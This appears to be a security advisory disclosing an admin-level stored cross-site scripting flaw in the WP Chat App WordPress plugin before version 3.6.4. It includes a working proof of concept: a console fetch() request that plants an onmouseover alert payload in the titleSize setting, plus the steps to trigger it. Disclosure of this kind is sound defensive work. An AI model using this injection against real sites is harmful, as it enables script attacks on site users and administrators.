WP Chat App < 3.6.4 - Admin+ Stored XSS

2024-04-0500:00:00

Dmitrii Ignatyev

wordpress chat application cross-site scripting vulnerability update required

6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.2%

JSON

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget

2. Paste and run the following in your browser's console:
await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": `title=Start+a+Conversation&isShowBtnLabel=on&btnLabel=Need+Help%3F+%3Cstrong%3EChat+with+us%3C%2Fstrong%3E&btnLabelWidth=156&textColor=%23fff&titleSize=titleSize=18"//'+onmouseover=alert(123)//&descriptionTextSize=12&accountNameSize=14&regularTextSize=11&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30&isShowPoweredBy=on&scrollHeight=500&responseText=The+team+typically+replies+in+a+few+minutes.&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage&action=njt_wa_save_design_setting&nonce=${njt_wa['nonce']}`,
    "method": "POST",
    "mode": "cors"
});

3. Refresh the page, navigate to the "Design" tab and hover your mouse on Widget Font Size -> Title